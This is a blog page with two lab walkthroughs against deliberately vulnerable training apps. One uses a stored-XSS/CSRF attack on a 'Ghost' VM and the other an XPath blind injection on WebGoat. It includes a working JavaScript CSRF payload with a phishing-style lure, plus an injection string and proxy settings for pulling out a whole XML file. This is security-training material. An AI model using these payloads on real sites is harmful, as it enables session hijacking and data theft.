Pages

Showing posts with label OWASPBWA. Show all posts
Showing posts with label OWASPBWA. Show all posts

Monday, September 5, 2011

Play with CSRF

Cross-Site Request Forgery (CSRF/XSRF)

A kind of Injection vulnerability. Used by hacker to exploit the trust that a site has for the authorized user.
More information please check the reference.

Victim:  Ghost VM (XSS & CSRF), admin user on Ghost server
Attacker:  test user on Ghost server

Attacking process:
1, Log in Gost server as admin user
2, submit "<script>alert(1)</script>" to check if there is XSS vulnerability. Of course it has...

3, use WEB Proxy (such as Burp) to check and analyze how the web application is working...
here, we submit test string "abc" and submit.
Burp capture the first request:

Burp capture the second request:

Now we understand how it works:
There are two requests sent to server. So we need to send two requests when write the attacking script.

we construct the malicious java script:

<script>
function test()
{
  var pd="vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin";
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.onreadystatechange=function() {
    var xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET", "/ghost/iframe.php?page=form.php", true);
    xmlhttp2.send();
  };
  xmlhttp.open("POST", "/ghost/blogView.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(pd);
}
</script>
Hi admin, Here is a problem. Pls <a href="" onclick="test()">check!</a>

Log in the server as test user and submit the attacking code and then we just waiting for admin to click it.

If the Admin was tricked and click the "check" link. He will submit the sentence "Hacked by F4l13n5n0w" to the server underground.

Have done.


Reference:
[1] http://www.cgisecurity.com/csrf-faq.html
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[3] http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp



Posted by at No comments:
Labels: , , ,

Tuesday, August 23, 2011

Play with XPATH Blind Explorer

xpath-blind-explorer v1.0 was released On the BlackHat_US 2011.

This is automated tool to explore the whole XML content through using XPATH Injection Vulnerability.

check the following links to get more information:

Demo video:
https://www.youtube.com/watch?v=IDQAj09fBvI&feature=related

Download:
http://code.google.com/p/xpath-blind-explorer/downloads/list


In the demo video, only GET method with one parameter was presented.

How about POST method with multi-parameters?

Let's use it to attack WebGoat XPATH Injection challenge.

Victim:       WebGoat (XPATH Injection Lesson)
Attacker:   Windows with xpath-blind-explorer v1.0

Attacking process:

1, submit the correct/incorrect Username and Password (e.g Mike/test123) to check the difference between responses.




If the username and password is correct, the server will return user's information otherwise will return nothing.
So here we use "468100" as the "true" condition keyword.


2, check source code to find out form's request URL and parameters' name
using firebug, we got the request URL is

http://192.168.235.134/WebGoat/attack?Screen=83&menu=1200

The parameter's name:

Username and Password and SUBMIT


3, Configure XPath Blind Explorer as follow:




Use Burp Proxy (listen at localhost, port 8080) to check how the request was created

Add Session cookie in order to pass the authentication with WebGoat server


4, Now we test condition

test "true" condition:

Let's see the request captured by Burp proxy.




The injection code "'%20and%20'1'='1" just appended at the end of all of parameters (which are URL encoded), That means XPath Blind Explorer treat multi-parameter as only one parameter(Blue Username is parameter's name and Red part is value which was URL encoded).

So now, we need to solve two problems:

1, The injection code only be appended at the end of parameters. So we need to change the order of parameters. Let's put the injectable parameter at the end, such as:

SUBMIT=Submit&Username=Mike&Password=test123


2, Because XPath Blind Explorer treat all parameters as only one parameter, so the parameters will be URL encoded including parameter link mark "&" (which is encoded to "%26", but should not be encoded). So we need to replace it back to "&".

Here we use Burp Proxy's function "match and replace", configure it as follow.


Here regex "(%26)" was used to match keyword.



Right now everything is done~ Let's launch it.

Waiting for several minutes, now we got the whole XML file~

Reference:
[1] http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
[2] http://www.zytrax.com/tech/web/regex.htm
[3] http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
[4] http://www.regextester.com/

Posted by at 3 comments:
Labels: , , , ,
Subscribe to: Posts (Atom)